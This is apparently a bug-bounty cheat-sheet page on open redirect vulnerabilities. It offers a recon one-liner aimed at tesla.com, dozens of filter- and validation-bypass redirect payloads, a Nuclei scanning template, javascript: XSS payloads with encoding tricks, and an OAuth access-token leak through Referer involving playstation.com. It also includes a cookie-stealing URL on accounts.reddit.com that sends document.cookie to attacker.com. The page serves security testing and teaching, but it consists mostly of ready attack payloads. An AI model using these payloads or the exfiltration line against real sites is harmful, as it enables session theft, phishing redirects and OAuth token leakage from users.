Open Redirection

Last updated 4 days ago

Open Redirection

You should be looking for open URL redirects in the following areas of your target:

Sign in & register pages
Sign out application route or API endpoint
Password resets (inspect the generated token link too as it may contain a redirect parameter)
Profile account page
Email verification links
Error pages
Any important action within the app that requires multiple steps

One-Liner

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Payloads

https://evil.com - ❌
https:evil.com ✅

# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com

# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com

# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com

# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company                                  # .company is a valid TLD
https://attacker.com%E3%80%82example.com                 # URL encoded Chinese dot
attacker%E3%80%82com

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\vicitm.om:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/

Parameter Pollution

/?next=target.com&next=evil.com

Creating folder as victim domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Nuclei Template

id: mass_48_open_redirect_check
info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium
requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"
      - type: status
        status:
          - 301
          - 302
          - 303
          - 304
          - 307
          - 308

DOM Based redirect - XSS

GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com

# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)


java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascriptpjavascriptt:confirm`0`

Cookie Stealing

https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie))

URL Validation Bypass

OAuth - Open Redirection to Token Leak

Vulnerable endpoint:

https://docs.playstation.com/redirect/?target=https://evil.com

Find a token in the URL - OAuth:

https://my.playstation.com/?access_token=XYZ123&state=abc

That access_token=XYZ123 was visible in the URL, which means it could be leaked via the Referer header if this page redirected the browser somewhere else.

Smuggle the Token via Referer

https://my.playstation.com/login/oauth?redirect_uri=https://docs.playstation.com/redirect/?target=https://evil.com

Referer: https://my.playstation.com/?access_token=XYZ123&state=abc

Tools

Go-recon - gr-openredirects:

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Resources

PreviousCORS NextCSPT

Last updated 4 days ago